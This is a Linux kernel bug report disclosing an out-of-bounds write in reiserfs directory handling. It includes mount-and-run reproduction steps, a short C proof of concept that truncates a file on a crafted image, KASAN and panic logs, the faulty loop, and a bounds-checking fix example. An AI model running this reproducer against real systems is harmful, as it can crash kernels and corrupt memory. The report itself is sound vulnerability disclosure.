https://bugzilla.kernel.org/show_bug.cgi?id=200339

            Bug ID: 200339
           Summary: Out-of-bound access in direntry_create_vi() when opening
                    file in reiserfs filesystem
           Product: File System
           Version: 2.5
    Kernel Version: 4.18
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ReiserFS
          Assignee: reiserfs-devel@xxxxxxxxxxxxxxx
          Reporter: wen.xu@xxxxxxxxxx
        Regression: No

Created attachment 276993
  --> https://bugzilla.kernel.org/attachment.cgi?id=276993&action=edit
The (compressed) crafted image which causes the crash

- Reproduce (4.18)

# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 70.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>

/* Open a file that already exists in the crafted image with O_TRUNC;
 * the truncate path is what reaches the broken loop in direntry_create_vi(). */
static void activity(char *mpoint)
{
	char *foo_bar_baz;

	if (asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint) < 0)
		error(1, errno, "asprintf");

	int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
	if (fd >= 0)
		close(fd);
	free(foo_bar_baz);
}

int main(int argc, char *argv[])
{
	if (argc < 2)
		error(1, 0, "usage: %s <mountpoint>", argv[0]);
	activity(argv[1]);
	return 0;
}

- Kernel message

[ 226.995305] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[ 226.995381] REISERFS (device loop0): using ordered data mode
[ 226.995387] reiserfs: using flush barriers
[ 226.996890] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[ 226.999178] REISERFS (device loop0): checking transaction log (loop0)
[ 227.816166] REISERFS (device loop0): Using r5 hash to sort names
[ 244.551132] REISERFS warning: vs-16090 direntry_bytes_number: bytes number is asked for direntry
[ 244.551139] REISERFS warning: vs-16090 direntry_bytes_number: bytes number is asked for direntry
[ 244.551337] ==================================================================
[ 244.554620] BUG: KASAN: slab-out-of-bounds in direntry_create_vi+0x1c1/0x320
[ 244.556047] Write of size 2 at addr ffff8801df5e1980 by task a.out/1365
[ 244.557746] CPU: 0 PID: 1365 Comm: a.out Not tainted 4.18.0-rc1+ #8
[ 244.557759] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 244.557768] Call Trace:
[ 244.557812]  dump_stack+0x7b/0xb5
[ 244.557845]  print_address_description+0x70/0x290
[ 244.557850]  kasan_report+0x291/0x390
[ 244.557855]  ? direntry_create_vi+0x1c1/0x320
[ 244.557870]  check_memory_region+0x139/0x190
[ 244.557875]  __asan_storeN+0x12/0x20
[ 244.557879]  direntry_create_vi+0x1c1/0x320
[ 244.557885]  ? indirect_print_item+0x150/0x150
[ 244.557893]  create_virtual_node+0x33b/0x9d0
[ 244.557899]  fix_nodes+0x2218/0x35c0
[ 244.557908]  ? create_virtual_node+0x9d0/0x9d0
[ 244.557912]  ? memset+0x31/0x40
[ 244.557919]  reiserfs_cut_from_item+0x1e4/0xbc0
[ 244.557930]  ? reiserfs_delete_solid_item+0x540/0x540
[ 244.557935]  ? kasan_check_write+0x14/0x20
[ 244.557953]  ? _raw_spin_lock_irqsave+0x2a/0x60
[ 244.557958]  ? _raw_spin_lock+0x17/0x40
[ 244.557963]  ? __asan_loadN+0xf/0x20
[ 244.557976]  ? widen_string+0x2e/0x110
[ 244.557982]  ? __asan_loadN+0xf/0x20
[ 244.558009]  ? pvclock_clocksource_read+0xd2/0x190
[ 244.558024]  ? __asan_loadN+0xf/0x20
[ 244.558030]  reiserfs_do_truncate+0x34b/0x770
[ 244.558036]  ? reiserfs_cut_from_item+0xbc0/0xbc0
[ 244.558043]  ? journal_begin+0x10f/0x1e0
[ 244.558049]  reiserfs_truncate_file+0x386/0x680
[ 244.558065]  ? __wait_on_freeing_inode+0x160/0x160
[ 244.558071]  ? reiserfs_new_inode+0x1180/0x1180
[ 244.558091]  ? truncate_pagecache+0x66/0x70
[ 244.558097]  reiserfs_setattr+0x3ad/0x69d
[ 244.558102]  ? sd_attrs_to_i_attrs+0x60/0x60
[ 244.558106]  ? current_time+0xb3/0x110
[ 244.558110]  ? timespec64_trunc+0x90/0x90
[ 244.558115]  ? security_get+0x51/0x60
[ 244.558142]  ? evm_inode_setattr+0x29/0xb0
[ 244.558149]  notify_change+0x4e1/0x680
[ 244.558173]  ? cap_inode_need_killpriv+0x2e/0x40
[ 244.558188]  do_truncate+0xe8/0x160
[ 244.558193]  ? do_truncate+0xe8/0x160
[ 244.558197]  ? file_open_root+0x1c0/0x1c0
[ 244.558210]  ? common_perm+0x290/0x290
[ 244.558218]  path_openat+0x60a/0x2160
[ 244.558224]  ? vfs_unlink+0x250/0x250
[ 244.558228]  ? save_stack+0x46/0xd0
[ 244.558231]  ? kasan_slab_alloc+0x11/0x20
[ 244.558236]  ? kmem_cache_alloc+0xd1/0x1e0
[ 244.558239]  ? getname_flags+0x76/0x2c0
[ 244.558243]  ? getname+0x12/0x20
[ 244.558249]  ? do_sys_open+0x14b/0x2c0
[ 244.558252]  ? __x64_sys_open+0x4c/0x60
[ 244.558267]  ? do_syscall_64+0x78/0x170
[ 244.558285]  ? add_to_page_cache_lru+0x190/0x190
[ 244.558292]  ? kasan_check_write+0x14/0x20
[ 244.558303]  ? __mod_node_page_state+0x90/0xa0
[ 244.558309]  ? kasan_check_write+0x14/0x20
[ 244.558313]  ? new_slab+0x450/0x660
[ 244.558326]  ? __handle_mm_fault+0x121a/0x19b0
[ 244.558333]  do_filp_open+0x12b/0x1d0
[ 244.558337]  ? may_open_dev+0x50/0x50
[ 244.558342]  ? kasan_kmalloc+0xad/0xe0
[ 244.558348]  do_sys_open+0x17c/0x2c0
[ 244.558352]  ? do_sys_open+0x17c/0x2c0
[ 244.558357]  ? filp_open+0x60/0x60
[ 244.558362]  ? vm_brk+0x20/0x20
[ 244.558367]  __x64_sys_open+0x4c/0x60
[ 244.558371]  do_syscall_64+0x78/0x170
[ 244.558377]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 244.558829] Allocated by task 1365:
[ 244.559560]  save_stack+0x46/0xd0
[ 244.559564]  kasan_kmalloc+0xad/0xe0
[ 244.559568]  __kmalloc+0x11f/0x240
[ 244.559572]  fix_nodes+0xa53/0x35c0
[ 244.559577]  reiserfs_cut_from_item+0x1e4/0xbc0
[ 244.559581]  reiserfs_do_truncate+0x34b/0x770
[ 244.559585]  reiserfs_truncate_file+0x386/0x680
[ 244.559589]  reiserfs_setattr+0x3ad/0x69d
[ 244.559592]  notify_change+0x4e1/0x680
[ 244.559596]  do_truncate+0xe8/0x160
[ 244.559599]  path_openat+0x60a/0x2160
[ 244.559602]  do_filp_open+0x12b/0x1d0
[ 244.559606]  do_sys_open+0x17c/0x2c0
[ 244.559610]  __x64_sys_open+0x4c/0x60
[ 244.559614]  do_syscall_64+0x78/0x170
[ 244.559618]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 244.559945] Freed by task 888:
[ 244.560607]  save_stack+0x46/0xd0
[ 244.560612]  __kasan_slab_free+0x13c/0x1a0
[ 244.560616]  kasan_slab_free+0xe/0x10
[ 244.560620]  kfree+0x8c/0x1c0
[ 244.560638]  skb_free_head+0x39/0x50
[ 244.560643]  skb_release_data+0x1e2/0x240
[ 244.560648]  skb_release_all+0x30/0x40
[ 244.560652]  consume_skb+0x50/0xe0
[ 244.560656]  skb_free_datagram+0x17/0x70
[ 244.560675]  netlink_recvmsg+0x2db/0x700
[ 244.560688]  sock_recvmsg+0x78/0x90
[ 244.560693]  ___sys_recvmsg+0x1c1/0x3a0
[ 244.560696]  __sys_recvmsg+0xe7/0x170
[ 244.560700]  __x64_sys_recvmsg+0x48/0x50
[ 244.560704]  do_syscall_64+0x78/0x170
[ 244.560708]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 244.561053] The buggy address belongs to the object at ffff8801df5e0000
               which belongs to the cache kmalloc-8192 of size 8192
[ 244.563606] The buggy address is located 6528 bytes inside of
               8192-byte region [ffff8801df5e0000, ffff8801df5e2000)
[ 244.566002] The buggy address belongs to the page:
[ 244.566989] page:ffffea00077d7800 count:1 mapcount:0 mapping:ffff8801f6802700 index:0x0 compound_mapcount: 0
[ 244.568988] flags: 0x2ffff0000008100(slab|head)
[ 244.569929] raw: 02ffff0000008100 0000000000000000 0000000100000001 ffff8801f6802700
[ 244.571487] raw: 0000000000000000 0000000080030003 00000001ffffffff 0000000000000000
[ 244.573049] page dumped because: kasan: bad access detected
[ 244.574498] Memory state around the buggy address:
[ 244.575473]  ffff8801df5e1880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 244.576939]  ffff8801df5e1900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 244.578393] >ffff8801df5e1980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 244.579844]                    ^
[ 244.580510]  ffff8801df5e1a00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 244.581973]  ffff8801df5e1a80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 244.583427] ==================================================================
[ 244.585162] Disabling lock debugging due to kernel taint
[ 244.589737] REISERFS panic (device loop0): vs-8030 create_virtual_node: virtual node space consumed
[ 244.589804] ------------[ cut here ]------------
[ 244.589807] kernel BUG at fs/reiserfs/prints.c:369!
[ 244.590911] invalid opcode: 0000 [#1] SMP KASAN PTI
[ 244.591924] CPU: 0 PID: 1365 Comm: a.out Tainted: G    B 4.18.0-rc1+ #8
[ 244.593479] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 244.595374] RIP: 0010:__reiserfs_panic+0xe2/0x130
[ 244.612537] Call Trace:
[ 244.613065]  ? reiserfs_debug+0x10/0x10
[ 244.613852]  ? direntry_create_vi+0x28e/0x320
[ 244.614742]  create_virtual_node+0x9c6/0x9d0
[ 244.615619]  fix_nodes+0x2218/0x35c0
[ 244.616360]  ? create_virtual_node+0x9d0/0x9d0
[ 244.617279]  ? memset+0x31/0x40
[ 244.617930]  reiserfs_cut_from_item+0x1e4/0xbc0
[ 244.618852]  ? reiserfs_delete_solid_item+0x540/0x540
[ 244.619876]  ? kasan_check_write+0x14/0x20
[ 244.620723]  ? _raw_spin_lock_irqsave+0x2a/0x60
[ 244.621648]  ? _raw_spin_lock+0x17/0x40
[ 244.622436]  ? __asan_loadN+0xf/0x20
[ 244.623173]  ? widen_string+0x2e/0x110
[ 244.623943]  ? __asan_loadN+0xf/0x20
[ 244.624693]  ? pvclock_clocksource_read+0xd2/0x190
[ 244.625680]  ? __asan_loadN+0xf/0x20
[ 244.626416]  reiserfs_do_truncate+0x34b/0x770
[ 244.627302]  ? reiserfs_cut_from_item+0xbc0/0xbc0
[ 244.628261]  ? journal_begin+0x10f/0x1e0
[ 244.629075]  reiserfs_truncate_file+0x386/0x680
[ 244.630002]  ? __wait_on_freeing_inode+0x160/0x160
[ 244.630978]  ? reiserfs_new_inode+0x1180/0x1180
[ 244.631899]  ? truncate_pagecache+0x66/0x70
[ 244.632767]  reiserfs_setattr+0x3ad/0x69d
[ 244.633590]  ? sd_attrs_to_i_attrs+0x60/0x60
[ 244.634463]  ? current_time+0xb3/0x110
[ 244.635235]  ? timespec64_trunc+0x90/0x90
[ 244.636058]  ? security_get+0x51/0x60
[ 244.636824]  ? evm_inode_setattr+0x29/0xb0
[ 244.637661]  notify_change+0x4e1/0x680
[ 244.638436]  ? cap_inode_need_killpriv+0x2e/0x40
[ 244.639374]  do_truncate+0xe8/0x160
[ 244.640092]  ? do_truncate+0xe8/0x160
[ 244.640857]  ? file_open_root+0x1c0/0x1c0
[ 244.641681]  ? common_perm+0x290/0x290
[ 244.642450]  path_openat+0x60a/0x2160
[ 244.643201]  ? vfs_unlink+0x250/0x250
[ 244.643951]  ? save_stack+0x46/0xd0
[ 244.644678]  ? kasan_slab_alloc+0x11/0x20
[ 244.645500]  ? kmem_cache_alloc+0xd1/0x1e0
[ 244.646335]  ? getname_flags+0x76/0x2c0
[ 244.647115]  ? getname+0x12/0x20
[ 244.647780]  ? do_sys_open+0x14b/0x2c0
[ 244.648546]  ? __x64_sys_open+0x4c/0x60
[ 244.649346]  ? do_syscall_64+0x78/0x170
[ 244.650138]  ? add_to_page_cache_lru+0x190/0x190
[ 244.651075]  ? kasan_check_write+0x14/0x20
[ 244.651908]  ? __mod_node_page_state+0x90/0xa0
[ 244.652823]  ? kasan_check_write+0x14/0x20
[ 244.653660]  ? new_slab+0x450/0x660
[ 244.654378]  ? __handle_mm_fault+0x121a/0x19b0
[ 244.655284]  do_filp_open+0x12b/0x1d0
[ 244.656037]  ? may_open_dev+0x50/0x50
[ 244.656803]  ? kasan_kmalloc+0xad/0xe0
[ 244.657576]  do_sys_open+0x17c/0x2c0
[ 244.658311]  ? do_sys_open+0x17c/0x2c0
[ 244.659079]  ? filp_open+0x60/0x60
[ 244.659780]  ? vm_brk+0x20/0x20
[ 244.660428]  __x64_sys_open+0x4c/0x60
[ 244.661191]  do_syscall_64+0x78/0x170
[ 244.661946]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 244.686114] ---[ end trace 2e85051acb5f6dc1 ]---

- Reason

https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/item_ops.c#L493

Regarding the kernel message, here:

	for (i = 0; i < dir_u->entry_count; i++) {
		j = old_entry_num(is_affected, i, vn->vn_pos_in_item, vn->vn_mode);
		dir_u->entry_sizes[i] =
		    (j ? deh_location(&deh[j - 1]) : ih_item_len(vi->vi_ih)) -
		    deh_location(&deh[j]) + DEH_SIZE;
	}

In this loop, i moves past the end of dir_u->entry_sizes, which leads to the KASAN alert.

Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech.
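The loop above takes the entry count and the entry locations straight from the on-disk directory item, so a crafted image controls how many entry_sizes slots are written. The following C function is an added example (not the reporter's code and not the kernel's) that performs the same per-entry size arithmetic but refuses inconsistent input first: the header array must fit inside the item, each entry's location must lie inside the item and not after the previous entry's location, and entry_count must not exceed the capacity of the output array. The struct de_head layout is an assumed mirror of the on-disk header with only the needed fields, and the sample items in demo() are constructed for illustration.

```c
#include <stdint.h>

/* Assumed mirror of the on-disk reiserfs directory entry header; only
 * the location field is used by the check below. DEH_SIZE is the
 * 16-byte header size the page's loop adds to each entry. */
#define DEH_SIZE 16u
struct de_head {
    uint32_t offset;
    uint32_t dir_id;
    uint32_t objectid;
    uint16_t location;  /* start of the entry body, relative to item start */
    uint16_t state;
};

/* Same arithmetic as the loop in direntry_create_vi(), but guarded.
 * Returns 0 and fills sizes[0..entry_count) on success, -1 on bad input. */
int checked_entry_sizes(const struct de_head *deh, unsigned entry_count,
                        unsigned item_len, unsigned short *sizes,
                        unsigned sizes_cap)
{
    /* the header array itself must fit in the item ... */
    if (entry_count == 0 || (uint64_t)entry_count * DEH_SIZE > item_len)
        return -1;
    /* ... and the output array must have room for every entry */
    if (entry_count > sizes_cap)
        return -1;
    for (unsigned i = 0; i < entry_count; i++) {
        /* bodies are packed back to front: entry i ends where entry i-1
         * starts, and entry 0 ends at the end of the item */
        unsigned end = i ? deh[i - 1].location : item_len;
        unsigned start = deh[i].location;
        if (start < entry_count * DEH_SIZE || start > end)
            return -1;
        sizes[i] = (unsigned short)(end - start + DEH_SIZE);
    }
    return 0;
}

/* Constructed sample: a 64-byte item with two entries (bodies at 48..63
 * and 32..47), then two corrupted variants that must be rejected. */
int demo(void)
{
    struct de_head ok[2] = { {0, 1, 2, 48, 4}, {0, 1, 3, 32, 4} };
    struct de_head bad[2] = { {0, 1, 2, 32, 4}, {0, 1, 3, 48, 4} }; /* out of order */
    unsigned short sizes[2];
    if (checked_entry_sizes(ok, 2, 64, sizes, 2) != 0) return 1;
    if (sizes[0] != 32 || sizes[1] != 32) return 2;
    if (checked_entry_sizes(ok, 9, 64, sizes, 2) == 0) return 3; /* 9 headers > item */
    if (checked_entry_sizes(bad, 2, 64, sizes, 2) == 0) return 4;
    return 0;
}
```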